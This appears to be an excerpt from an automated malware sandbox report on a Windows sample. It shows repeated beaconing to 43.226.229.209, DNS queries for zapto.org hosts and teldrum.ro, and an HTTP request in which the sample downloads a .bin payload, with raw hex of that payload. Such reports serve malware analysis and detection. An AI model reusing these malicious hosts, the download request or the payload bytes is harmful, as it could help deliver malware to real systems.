                                                                Jan 14, 2025 15:43:44.585750103 CET500213980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:44.591145039 CET39805002143.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:44.591273069 CET500213980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:44.593686104 CET500213980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:44.598969936 CET39805002143.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:45.906280994 CET39805002143.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:45.906383991 CET500213980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:45.906564951 CET500213980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:45.908406973 CET500223981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:45.911459923 CET39805002143.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:45.913290024 CET39815002243.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:45.913491964 CET500223981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:45.917767048 CET500223981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:45.922542095 CET39815002243.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:47.316090107 CET39815002243.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:47.316159010 CET500223981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:47.316557884 CET500223981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:47.321361065 CET39815002243.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:48.319335938 CET500233980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:48.325059891 CET39805002343.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:48.325176001 CET500233980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:48.327338934 CET500233980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:48.332932949 CET39805002343.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:49.635440111 CET39805002343.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:49.635551929 CET500233980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:49.635643959 CET500233980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:49.637226105 CET500243981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:49.640389919 CET39805002343.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:49.642047882 CET39815002443.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:49.642211914 CET500243981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:49.646553040 CET500243981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:49.651293993 CET39815002443.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:51.006272078 CET39815002443.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:51.006361008 CET500243981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:51.006761074 CET500243981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:51.011548042 CET39815002443.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:52.022948027 CET500253980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:52.027945995 CET39805002543.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:52.028059006 CET500253980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:52.028882980 CET500253980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:52.033781052 CET39805002543.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:53.341420889 CET39805002543.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:53.341537952 CET500253980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:53.341669083 CET500253980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:53.345006943 CET500263981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:53.346401930 CET39805002543.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:53.349776983 CET39815002643.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:53.349906921 CET500263981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:53.354360104 CET500263981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:53.359319925 CET39815002643.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:54.684520006 CET39815002643.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:54.684683084 CET500263981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:54.685151100 CET500263981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:54.690875053 CET39815002643.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:55.694540024 CET500273980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:55.699361086 CET39805002743.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:55.699434042 CET500273980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:55.700248003 CET500273980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:55.705091953 CET39805002743.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:57.022428036 CET39805002743.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:57.022504091 CET500273980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:57.022651911 CET500273980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:57.024315119 CET500283981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:57.027477980 CET39805002743.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:57.029704094 CET39815002843.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:57.029777050 CET500283981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:57.034301043 CET500283981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:57.039108992 CET39815002843.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:58.413055897 CET39815002843.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:58.413124084 CET500283981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:58.413690090 CET500283981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:58.418687105 CET39815002843.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:59.444809914 CET500293980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:59.449702978 CET39805002943.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:43:59.449858904 CET500293980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:59.450331926 CET500293980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:43:59.455415010 CET39805002943.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:44:00.814275980 CET39805002943.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:44:00.814369917 CET500293980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:44:00.814471960 CET500293980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:44:00.815893888 CET500303981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:44:00.819283009 CET39805002943.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:44:00.820871115 CET39815003043.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:44:00.820956945 CET500303981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:44:00.825330019 CET500303981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:44:00.830116034 CET39815003043.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:44:02.141468048 CET39815003043.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:44:02.141532898 CET500303981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:44:02.142611980 CET500303981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:44:02.147443056 CET39815003043.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:44:03.369297981 CET500313980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:44:03.374193907 CET39805003143.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:44:03.377470970 CET500313980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:44:03.378072977 CET500313980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:44:03.382863998 CET39805003143.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:44:04.725056887 CET39805003143.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:44:04.726032019 CET500313980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:44:04.726121902 CET500313980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:44:04.727555990 CET500323981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:44:04.730931044 CET39805003143.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:44:04.732391119 CET39815003243.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:44:04.732515097 CET500323981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:44:04.736651897 CET500323981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:44:04.741445065 CET39815003243.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:44:06.061364889 CET39815003243.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:44:06.062993050 CET500323981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:44:09.257860899 CET500323981192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:44:09.262907028 CET39815003243.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:44:10.288573980 CET500333980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:44:10.293476105 CET39805003343.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:44:10.293622017 CET500333980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:44:10.294477940 CET500333980192.168.2.543.226.229.209
                                                                Jan 14, 2025 15:44:10.299442053 CET39805003343.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:44:11.612766981 CET39805003343.226.229.209192.168.2.5
                                                                Jan 14, 2025 15:44:11.612868071 CET500333980192.168.2.543.226.229.209
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 14, 2025 15:42:19.692228079 CET5519853192.168.2.51.1.1.1
                                                                Jan 14, 2025 15:42:19.764045954 CET53551981.1.1.1192.168.2.5
                                                                Jan 14, 2025 15:42:27.035768032 CET5880353192.168.2.51.1.1.1
                                                                Jan 14, 2025 15:42:27.044796944 CET53588031.1.1.1192.168.2.5
                                                                Jan 14, 2025 15:42:29.700495958 CET5714053192.168.2.51.1.1.1
                                                                Jan 14, 2025 15:42:29.716342926 CET53571401.1.1.1192.168.2.5
                                                                Jan 14, 2025 15:42:37.053982973 CET5098853192.168.2.51.1.1.1
                                                                Jan 14, 2025 15:42:37.063736916 CET53509881.1.1.1192.168.2.5
                                                                Jan 14, 2025 15:42:44.542865992 CET5485953192.168.2.51.1.1.1
                                                                Jan 14, 2025 15:42:44.551646948 CET53548591.1.1.1192.168.2.5
                                                                Jan 14, 2025 15:42:51.902858019 CET5226353192.168.2.51.1.1.1
                                                                Jan 14, 2025 15:42:51.913228989 CET53522631.1.1.1192.168.2.5
                                                                Jan 14, 2025 15:42:59.284748077 CET5901753192.168.2.51.1.1.1
                                                                Jan 14, 2025 15:42:59.293608904 CET53590171.1.1.1192.168.2.5
                                                                Jan 14, 2025 15:43:06.668732882 CET5124953192.168.2.51.1.1.1
                                                                Jan 14, 2025 15:43:06.677172899 CET53512491.1.1.1192.168.2.5
                                                                Jan 14, 2025 15:43:14.001919985 CET6203153192.168.2.51.1.1.1
                                                                Jan 14, 2025 15:43:14.010696888 CET53620311.1.1.1192.168.2.5
                                                                Jan 14, 2025 15:43:21.415873051 CET5834653192.168.2.51.1.1.1
                                                                Jan 14, 2025 15:43:21.423449039 CET53583461.1.1.1192.168.2.5
                                                                Jan 14, 2025 15:43:27.441461086 CET5063353192.168.2.51.1.1.1
                                                                Jan 14, 2025 15:43:27.450603008 CET53506331.1.1.1192.168.2.5
                                                                Jan 14, 2025 15:43:28.781955004 CET5104453192.168.2.51.1.1.1
                                                                Jan 14, 2025 15:43:28.790777922 CET53510441.1.1.1192.168.2.5
                                                                Jan 14, 2025 15:43:36.190469980 CET5823253192.168.2.51.1.1.1
                                                                Jan 14, 2025 15:43:36.199757099 CET53582321.1.1.1192.168.2.5
                                                                Jan 14, 2025 15:43:43.562196970 CET5298953192.168.2.51.1.1.1
                                                                Jan 14, 2025 15:43:43.571626902 CET53529891.1.1.1192.168.2.5
                                                                Jan 14, 2025 15:43:51.007769108 CET5987353192.168.2.51.1.1.1
                                                                Jan 14, 2025 15:43:51.018682957 CET53598731.1.1.1192.168.2.5
                                                                Jan 14, 2025 15:43:58.414611101 CET6308553192.168.2.51.1.1.1
                                                                Jan 14, 2025 15:43:58.431173086 CET53630851.1.1.1192.168.2.5
                                                                Jan 14, 2025 15:44:09.259247065 CET6155553192.168.2.51.1.1.1
                                                                Jan 14, 2025 15:44:09.275396109 CET53615551.1.1.1192.168.2.5
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Jan 14, 2025 15:42:19.692228079 CET192.168.2.51.1.1.10xd056Standard query (0)teldrum.roA (IP address)IN (0x0001)false
                                                                Jan 14, 2025 15:42:27.035768032 CET192.168.2.51.1.1.10xf00Standard query (0)linktreewealth.zapto.orgA (IP address)IN (0x0001)false
                                                                Jan 14, 2025 15:42:29.700495958 CET192.168.2.51.1.1.10x7590Standard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                                Jan 14, 2025 15:42:37.053982973 CET192.168.2.51.1.1.10xccaStandard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                                Jan 14, 2025 15:42:44.542865992 CET192.168.2.51.1.1.10xbaf7Standard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                                Jan 14, 2025 15:42:51.902858019 CET192.168.2.51.1.1.10xb42dStandard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                                Jan 14, 2025 15:42:59.284748077 CET192.168.2.51.1.1.10xaa4cStandard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                                Jan 14, 2025 15:43:06.668732882 CET192.168.2.51.1.1.10x106eStandard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                                Jan 14, 2025 15:43:14.001919985 CET192.168.2.51.1.1.10xf5d8Standard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                                Jan 14, 2025 15:43:21.415873051 CET192.168.2.51.1.1.10x2502Standard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                                Jan 14, 2025 15:43:27.441461086 CET192.168.2.51.1.1.10x7ac1Standard query (0)linktreewealth.zapto.orgA (IP address)IN (0x0001)false
                                                                Jan 14, 2025 15:43:28.781955004 CET192.168.2.51.1.1.10xadfStandard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                                Jan 14, 2025 15:43:36.190469980 CET192.168.2.51.1.1.10x9ea5Standard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                                Jan 14, 2025 15:43:43.562196970 CET192.168.2.51.1.1.10x3ba8Standard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                                Jan 14, 2025 15:43:51.007769108 CET192.168.2.51.1.1.10x4798Standard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                                Jan 14, 2025 15:43:58.414611101 CET192.168.2.51.1.1.10x5109Standard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                                Jan 14, 2025 15:44:09.259247065 CET192.168.2.51.1.1.10x5c5aStandard query (0)linktreewealthy.zapto.orgA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Jan 14, 2025 15:42:19.764045954 CET1.1.1.1192.168.2.50xd056No error (0)teldrum.ro109.99.162.14A (IP address)IN (0x0001)false
                                                                Jan 14, 2025 15:42:27.044796944 CET1.1.1.1192.168.2.50xf00No error (0)linktreewealth.zapto.org43.226.229.209A (IP address)IN (0x0001)false
                                                                Jan 14, 2025 15:43:27.450603008 CET1.1.1.1192.168.2.50x7ac1No error (0)linktreewealth.zapto.org43.226.229.209A (IP address)IN (0x0001)false
                                                                • teldrum.ro
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.549978109.99.162.144435064C:\Users\user\Desktop\x6yDsHJ9tr.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-14 14:42:20 UTC173OUTGET /NJrdZqNcCtz102.bin HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: teldrum.ro
                                                                Cache-Control: no-cache
                                                                2025-01-14 14:42:21 UTC223INHTTP/1.1 200 OK
                                                                Date: Tue, 14 Jan 2025 14:42:21 GMT
                                                                Server: Apache
                                                                Last-Modified: Mon, 13 Jan 2025 20:36:39 GMT
                                                                Accept-Ranges: bytes
                                                                Content-Length: 493632
                                                                Connection: close
                                                                Content-Type: application/octet-stream
                                                                2025-01-14 14:42:21 UTC7969INData Raw: 7c cd 41 88 f3 aa b9 07 43 9f e2 63 1a 47 c0 99 31 f6 fb dd 98 80 55 65 a7 3c 37 0d 1d c9 47 fe 3b 7b 83 83 8b 95 f6 6d 84 04 cf 6b 56 6c 14 ef e6 62 6a 1b 24 de 29 fd 65 9d da 35 73 99 e0 3b e3 64 d9 d6 0b 86 83 14 68 d8 e0 b2 71 08 bb eb 3f b2 62 d1 c7 75 5f 29 f3 08 48 8e 63 dd b2 49 43 5d 51 bf b9 8a 67 bc bc 96 79 ae f3 18 ed fb c1 77 64 3d 94 2f ed 87 5d 08 71 1e ac 12 a9 4f 7e f6 2b bc 12 74 fb 4f d2 b0 1b 55 d7 e6 5a 1b ee ab 6e 5a bf 78 48 59 e7 8c b6 10 26 c5 e7 f3 13 33 03 d8 c0 69 ac 98 f1 0c 97 0f 65 30 a8 48 cf 5a f1 85 13 86 2b 0e 4c 0b 2a f8 12 3d cd 6d d1 d5 8e 28 37 d4 0c 7a 57 8e 4f 0f 20 d0 03 36 e7 ef 39 b3 65 fb 8e eb 51 8b 00 6c e4 24 1e 3b e1 f0 e7 99 2f 1f 74 43 d5 8d 49 43 6a 86 fa 0d 53 43 da 6a 0d 59 35 99 86 b3 4c 7d 52 02 d1
                                                                Data Ascii: |ACcG1Ue<7G;{mkVlbj$)e5s;dhq?bu_)HcIC]Qgywd=/]qO~+tOUZnZxHY&3ie0HZ+L*=m(7zWO 69eQl$;/tCICjSCjY5L}R
                                                                2025-01-14 14:42:21 UTC8000INData Raw: 14 7f ba 45 09 92 32 0f ea 33 6d d8 1a 88 94 cd 80 d9 de 78 1c 70 47 04 b3 85 ac 5c c4 03 ff 34 19 85 30 5a 54 a9 fc 6f f4 f5 4e 6c ab c8 ed 80 c3 51 93 da 8f 94 b5 96 ef 0d 3c 87 f0 60 c8 d0 72 ed 77 b1 ba 93 a2 bd a9 e7 c4 16 88 34 03 a0 68 16 25 bd 91 6a 01 6b ce d5 68 fa 35 f0 34 47 02 c0 86 37 e3 db 86 a7 f6 1b ea 4c 22 e1 9c ec dc 2f 0b 5c db fe 86 9c a2 3f 12 ec 92 13 7c 9d 90 4a 66 cd 42 d6 99 ca 08 a1 bd 46 6d 96 6e 7b 1d 6e 6f 92 22 af 5d 14 fc 39 99 cd 0d 7a a1 3e db 3d 2d e6 9d a0 aa 53 e8 7f 27 06 79 35 41 35 6d b3 49 68 8c 71 17 2f 03 99 00 3a c3 94 18 70 b8 f2 d5 33 13 bd 41 77 71 f9 37 31 ac 06 9c 5b 65 1c 03 7b fd 5d aa 1b db 42 96 69 e1 81 f8 e2 75 ec 13 a3 cb 8a 04 1a 10 d8 55 03 e9 f8 eb 66 56 7b f5 da cd 49 08 03 4c d6 ff cc c6 31 ca
                                                                Data Ascii: E23mxpG\40ZToNlQ<`rw4h%jkh54G7L"/\?|JfBFmn{no"]9z>=-S'y5A5mIhq/:p3Awq71[e{]BiuUfV{IL1
                                                                2025-01-14 14:42:21 UTC8000INData Raw: 1d 99 73 43 23 e8 b2 91 f3 06 0d a9 1d 75 98 f2 f3 8c 70 3a 7b 6b ef b1 8a e6 f5 13 19 7c b8 59 2d 4e 0c 0d d7 06 be 96 e0 6c 06 51 10 83 80 75 2c a1 13 99 ef 74 59 fb 19 54 8c d2 c1 15 c5 93 b3 b2 85 88 d2 fc bf 72 e5 bb 88 20 3a e4 b7 d6 00 91 c5 d9 7d 6f 91 1a 7f dd 13 84 10 2a 40 be 17 88 53 a7 f7 a2 b6 0e 28 cd c9 e7 d6 df 0c 29 2d 01 49 e3 c1 eb 6d 4c 9d 70 41 c5 64 eb b1 45 23 fc 63 49 c9 84 44 9a 92 d0 0d 51 ed 19 11 e6 c2 80 89 4d f9 bb 50 c4 19 66 92 aa e8 e2 87 2b 1a 4b f7 92 6d 70 f3 5d 91 89 33 22 10 24 55 c3 70 f3 9a c5 b7 fd c1 a9 49 6b f8 d0 db bd d4 36 45 f6 5f db 79 8d ca aa 9c a4 27 9e 85 97 63 f9 8b 23 7a 00 8d fe 2d 22 33 e8 26 d1 9f 4b ec f4 ce 5b c8 a3 d1 64 3e 65 4e f7 7a 30 22 f8 20 fd e6 7e 33 85 54 c9 df 40 16 5e 1c 2a ec 15 64
                                                                Data Ascii: sC#up:{k|Y-NlQu,tYTr :}o*@S()-ImLpAdE#cIDQMPf+Kmp]3"$UpIk6E_y'c#z-"3&K[d>eNz0" ~3T@^*d
                                                                2025-01-14 14:42:21 UTC8000INData Raw: e3 20 b1 06 5b 94 71 65 e9 ba 28 b3 50 80 36 e6 26 4b b4 36 a0 ab 64 ff 63 32 8e d4 61 bc b7 dd 4f 9d 09 da 48 ea 83 1b 49 74 33 ad 32 6b 05 69 b1 61 8c 07 ba 74 57 ff 19 5d 5b f0 bc 27 06 89 42 d9 e2 88 b0 eb 05 36 57 d5 0e fe 56 b7 d3 86 2c ef 87 bc 5a 1b ac be 8b 44 1f ae 0d 28 7a fe de 66 1c 85 65 92 9b 86 a0 9c f9 7d 2b 42 b0 d8 f1 d8 30 bb d6 a8 98 05 5e 39 f4 e0 e5 25 7f d8 e4 c4 82 3a b5 64 81 35 78 85 d6 c6 d1 0b 74 4c 0b 26 6e 51 03 2a f0 f7 2b 8d 80 7f 0b 24 ff 65 7c 37 d9 7a c1 b0 4b 1c 69 4d 0f 92 3c c5 c7 71 f9 fe fa d5 5d b2 65 33 7c 50 74 61 78 51 6f db f3 5b 2d 1b 2e e5 13 67 71 c7 72 80 f6 c4 36 aa 40 dd d2 35 80 a9 ec fd dd e8 94 93 c3 32 bf 77 c3 e6 af df d7 e0 74 6f ef 9c d1 1c c7 8d 02 3b 6b 28 22 41 19 25 cb 6b aa e4 28 4e 27 64 a1
                                                                Data Ascii: [qe(P6&K6dc2aOHIt32kiatW]['B6WV,ZD(zfe}+B0^9%:d5xtL&nQ*+$e|7zKiM<q]e3|PtaxQo[-.gqr6@52wto;k("A%k(N'd
                                                                2025-01-14 14:42:21 UTC8000INData Raw: 7f 8d df 74 cd 00 10 39 15 3c 84 c7 84 9c 29 2b 11 22 45 b2 31 27 5f 50 be 5b 34 ef 2b dc be 71 9a e5 60 bf b3 2c 9b 42 9f 6c 58 03 a8 89 65 22 b0 b9 a3 f9 29 f7 93 6c bb 4d 57 b2 09 d6 9e 99 aa e4 ba e5 30 55 99 4e d8 84 28 7f d0 6d 53 c5 b5 18 e7 c7 67 fa 38 fb dd 6d 03 6d 18 ba fe 2b 42 14 24 60 9e 1e ed a2 c6 82 2d 21 22 0b e9 65 b3 30 55 0b 23 72 ed 23 ba f7 be c1 7c 4b 91 dd 2f 5c ec 66 cc 00 ee c2 22 48 70 5f e1 0b 7f 9b 1d f9 ba 1b a4 a2 f6 cc 26 9d 4e 04 fd 30 91 bc bc 20 d6 f7 e8 69 b1 a5 a3 2d d5 62 0c 7b d7 74 a9 b6 36 35 37 6f 15 7d e0 9e 3c 09 bd 6a 5c 16 15 1f e4 25 ee 4e 4c 39 62 06 3d 40 ac 9e 66 9a 75 bf b9 a4 9c a9 19 f1 9d 30 b8 69 a7 79 ae 14 f8 72 1b 49 a7 94 0e 3d a1 78 f6 75 ec 65 ae 79 4d 19 f3 6c c0 f2 b7 a8 2d 93 b4 c6 b8 f8 09
                                                                Data Ascii: t9<)+"E1'_P[4+q`,BlXe")lMW0UN(mSg8mm+B$`-!"e0U#r#|K/\f"Hp_&N0 i-b{t657o}<j\%NL9b=@fu0iyrI=xueyMl-
                                                                2025-01-14 14:42:21 UTC8000INData Raw: 56 98 2e 6e 4e b8 92 f3 84 a4 48 f2 82 26 98 03 e0 19 59 53 59 0e 60 85 86 7f b2 d6 f2 3b 40 28 65 7a b5 15 bf 06 d9 09 a2 8b 2d 09 68 ea cb 01 ed 5a 40 f2 4b 75 b2 da e7 a4 ec a3 35 46 65 ba df d9 75 0e 75 9f ae b3 04 3e e0 3c f5 eb 93 5b 0c aa 05 3b ec 03 ac c5 9d 2e 44 99 47 a2 7f 60 1c ea 25 dd 5a 55 34 a2 ae 57 fb 8a 66 bc 3f 52 49 68 b5 51 ed 7b bf 3d 64 48 84 ac d3 87 29 03 8e 28 5b 06 39 cc 35 e9 12 94 12 70 f3 69 f1 3a da 46 44 0e cd 26 0c 34 cd c6 8d 41 78 a6 c3 11 1d 8a 17 54 9c 40 e5 56 61 30 a5 13 63 ee bd 23 f9 47 a5 14 bd 68 f2 b8 d8 20 d5 b6 2e 04 68 52 a1 28 9f 70 15 85 09 7c c6 73 d6 cc 58 c0 e7 2e f5 8d 67 67 57 8c 33 d3 47 31 31 4c da 51 9d b7 64 ee 08 93 4a 81 e5 cc e7 14 76 a8 20 b0 21 d9 14 b4 d3 9e cb 38 74 a8 c4 c4 b8 a6 a1 92 e7
                                                                Data Ascii: V.nNH&YSY`;@(ez-hZ@Ku5Feuu><[;.DG`%ZU4Wf?RIhQ{=dH)([95pi:FD&4AxT@Va0c#Gh .hR(p|sX.ggW3G11LQdJv !8t
                                                                2025-01-14 14:42:21 UTC8000INData Raw: c5 05 3d 3b 77 e5 ab 9e 85 41 f4 35 46 ad 80 5c 27 0e c9 07 23 34 d6 b7 63 95 67 b7 b1 91 3f ef 7f ff cb 91 cc e4 9f dc 99 d7 c1 38 2f 5d 2a bc d0 a6 36 8c c2 53 d6 e4 fd 32 28 c6 b5 16 a9 a9 af af 84 b6 2b 70 3f 39 4b 99 c8 1a 72 f2 a7 7d c0 2e 7a 25 3a 7f 15 24 29 b5 7a cc 75 93 8b 16 07 bd 44 23 f9 55 ef 22 11 ca 38 32 a2 2a b7 9b 31 60 5d 3d c2 a1 e5 1d 1a 72 e6 8f 6b b6 17 e3 0c 31 da c2 ce e6 29 31 2f f6 39 40 be 92 f9 5d d6 27 a0 a4 47 45 ee b2 a4 b4 3c da 8e 6b 66 82 9e a1 4e f9 21 0a a5 83 01 9a ae 53 aa 21 88 99 c7 ad 98 ac 1a a8 3f cb 04 64 c9 ea 4a 2e 85 34 36 31 8e a8 c9 8d 17 dc ec 67 fd c5 03 e0 7b 1c dd 69 77 26 2c 62 16 be 68 03 32 b8 17 a7 14 ff 07 74 04 77 63 a0 30 ab 42 6f 33 6a 33 44 c8 b1 d6 c7 3c 84 a8 4f 83 03 ca 4d 57 24 58 92 6f
                                                                Data Ascii: =;wA5F\'#4cg?8/]*6S2(+p?9Kr}.z%:$)zuD#U"82*1`]=rk1)1/9@]'GE<kfN!S!?dJ.461g{iw&,bh2twc0Bo3j3D<OMW$Xo
                                                                2025-01-14 14:42:21 UTC8000INData Raw: e6 b7 0d 40 8b 1e d8 64 6c d9 a2 d6 72 bd 50 85 29 57 23 a8 f7 4d 56 51 67 ff 06 88 a0 83 5f 65 f0 f8 fa 19 6a fb f3 9b 97 b5 30 da e0 34 bc 86 43 62 50 0d 98 a4 49 5b e4 ac 8d 19 a9 79 5b d7 09 ec f8 3c 05 93 f3 33 1b 7f f3 4d 11 6d 44 c1 12 f1 00 a2 90 41 4d 0c 00 49 0b d7 d2 54 b6 d8 7e 71 83 65 e9 42 89 b6 8c 9c 5d 40 66 6c 12 8c 8d 8e 16 05 fb 7d 5e 9f 0b 78 32 92 17 d2 f5 44 0f b2 71 1f 1d 71 e1 85 2c 23 4e 49 f3 84 c6 28 da 50 62 49 97 8e 70 74 fd d8 09 df 66 6c 07 4a b4 80 fb af 92 85 9a 18 f7 df b0 81 fc f9 6a 4f 30 57 43 36 a6 ab 93 39 15 7a 89 87 76 e8 aa d4 76 0e 3b 96 3c c0 0b d9 14 94 a3 3b e0 e4 57 08 08 87 9a 35 bb ef 80 5c f5 53 6c d5 8b ed 80 cb 58 38 c2 4e 69 40 69 7a 80 8d 93 d5 a6 a9 c8 ef 33 34 b5 1a 3f 37 41 ad e6 1c bd f0 1f 79 73
                                                                Data Ascii: @dlrP)W#MVQg_ej04CbPI[y[<3MmDAMIT~qeB]@fl}^x2Dqq,#NI(PbIptflJjO0WC69zvv;<;W5\SlX8Ni@iz34?7Ays
